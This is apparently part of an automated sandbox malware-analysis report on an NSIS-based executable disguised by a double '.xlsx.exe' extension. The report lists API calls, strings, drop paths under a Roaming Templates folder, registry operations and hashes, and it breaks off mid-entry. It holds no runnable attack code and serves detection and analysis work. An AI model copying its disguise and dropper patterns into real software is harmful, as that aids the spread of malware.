                                                          • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 00405841
                                                          • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 00405864
                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 0040586A
                                                          • FindFirstFileW.KERNELBASE(004246F0,?,?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 0040587A
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                          • FindClose.KERNEL32(00000000), ref: 00405929
                                                          Strings
                                                          • "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", xrefs: 004057D9
                                                          • \*.*, xrefs: 0040583B
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057DE
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-3281266623
                                                          • Opcode ID: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                          • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                          • Opcode Fuzzy Hash: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                          • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                          • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,?,?,75572EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00406296
                                                          • FindClose.KERNEL32(00000000), ref: 004062A2
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: 8WB
                                                          • API String ID: 2295610775-3088156181
                                                          • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                          • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                          • LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 004062CF
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          • String ID:
                                                          • API String ID: 310444273-0
                                                          • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                          • Instruction ID: 6db28869a22d2b590e25977263656b8717a92efcd7e963286bbc5c179789795b
                                                          • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                          • Instruction Fuzzy Hash: F2E0C236E0C120ABC7225B209E4896B73ACAFE9651305043EF506F6280C774EC229BE9
                                                          APIs
                                                          • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,?), ref: 004020BD
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling, xrefs: 004020FB
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling
                                                          • API String ID: 542301482-3871883919
                                                          • Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                          • Instruction ID: 3f054c58238b343a02ca2e9776fd111f4d7efc3a485c04e582207c90830a0c16
                                                          • Opcode Fuzzy Hash: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                          • Instruction Fuzzy Hash: BC414F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                          • Instruction ID: 330ade1cb5eaca6017f72c73cdc8309555cb727b7ded56d963bee508ab8c6b31
                                                          • Opcode Fuzzy Hash: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                          • Instruction Fuzzy Hash: A2E04676290108BADB00EFA4EE4AF9A77ECEB18704F008421B608E6091C774E9408BA8

                                                          Control-flow Graph (rendered graph not reproduced in text)
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                          • ShowWindow.USER32(?), ref: 00403D1B
                                                          • DestroyWindow.USER32 ref: 00403D2F
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                          • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                          • EnableWindow.USER32(?,?), ref: 00403F9E
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                          • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                          • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403FD3
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                          • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                          • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: &B
                                                          • API String ID: 3282139019-3208460036
                                                          • Opcode ID: 1ba26ddb7cc3656f9a64845b4b1793df4e6810f285f0ef41b34257c574bccbbf
                                                          • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                          • Opcode Fuzzy Hash: 1ba26ddb7cc3656f9a64845b4b1793df4e6810f285f0ef41b34257c574bccbbf
                                                          • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E

                                                          Control-flow Graph (rendered graph not reproduced in text)
                                                          APIs
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 004039A0
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy), ref: 00403A87
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                          • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403ADC
                                                          • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                          • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                          • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                          • API String ID: 914957316-1379373393
                                                          • Opcode ID: 88edaa45a3bb59404545fecdb829bfa4bbc7651b3de16964f3c32b9c1e3b42f4
                                                          • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                          • Opcode Fuzzy Hash: 88edaa45a3bb59404545fecdb829bfa4bbc7651b3de16964f3c32b9c1e3b42f4
                                                          • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D

                                                          Control-flow Graph (rendered graph not reproduced in text)
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,?), ref: 00402DEC
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00402E35
                                                          • GlobalAlloc.KERNELBASE(?,00409230), ref: 00402F7C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                                                          • API String ID: 2803837635-1138875742

                                                          Control-flow Graph: function entry at 401752 (graph not reproduced)
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling,?,?,00000031), ref: 00401793
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling,?,?,00000031), ref: 004017B8
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp$C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling$Call
                                                          • API String ID: 1941528284-3436744434

                                                          Control-flow Graph: function entry at 4051f2 (graph not reproduced)
                                                          APIs
                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                          • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll), ref: 0040525F
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll
                                                          • API String ID: 2531174081-1312793894

                                                          Control-flow Graph: function entry at 402573 (graph not reproduced)
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402616
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402639
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040264F
                                                            • Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Similarity
                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                          • String ID: 9
                                                          • API String ID: 1149667376-2366072709

                                                          Control-flow Graph: function entry at 4015b9 (graph not reproduced)
                                                          APIs
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,?,?,75572EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 00405A4C
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 004015E3
                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015ED
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 004015FD
                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling,?,00000000,?), ref: 00401630
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling, xrefs: 00401623
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling
                                                          • API String ID: 3751793516-3871883919

                                                          Control-flow Graph: function entry at 402b7a (graph not reproduced)
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                          • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                          • Opcode Fuzzy Hash: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                          • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69

                                                          Control-flow Graph

                                                          • Function 10001759-100018a8 (30 basic blocks); internal calls: 10001b18, 10002286, 100022d0, 100024a9, 100015b4, 10001272, 10002b5f, 100028a4, 10002645, 1000246c, 1000153d; API nodes: GlobalFree (blocks 100017ee-1000180a and 1000189f-100018a0), FreeLibrary (block 1000187a-1000187b)
                                                          APIs
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(?,00001020), ref: 100022B8
                                                            • Part of subcall function 10002645: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                          • String ID:
                                                          • API String ID: 1791698881-3916222277
                                                          • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                          • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                          • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                          • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                          Control-flow Graph

                                                          • Function 405e15-405e8c (7 basic blocks); API nodes: RegOpenKeyExW (block 405e15-405e47), RegQueryValueExW (block 405e49-405e68), RegCloseKey (block 405e79-405e83); the RegOpenKeyExW block also branches directly to the exit block 405e89-405e8c, skipping both the value query and the RegCloseKey
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
                                                          • RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3677997916-1824292864
                                                          • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                          • Instruction ID: 600534e839ec184522a2ed62e812a695e1e378dc1a2fe7ff70d8343822b3fb0e
                                                          • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                          • Instruction Fuzzy Hash: A7015A3114020EEACB218F56EC08EEB3BA8EF54390F00413AF944D2220D334DA64CBE5

                                                          Control-flow Graph

                                                          • Function 405be3-405c35 (6 basic blocks); API nodes: GetTickCount and GetTempFileNameW, both in block 405bf0-405c24, which is re-entered from block 405c26-405c28 (a retry loop around the temp-file creation)
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405C01
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C1C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-1331003597
                                                          • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                          • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                            • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                          • WriteFile.KERNELBASE(0040BE90,00411737,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                          • SetFilePointer.KERNELBASE(00004DC4,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
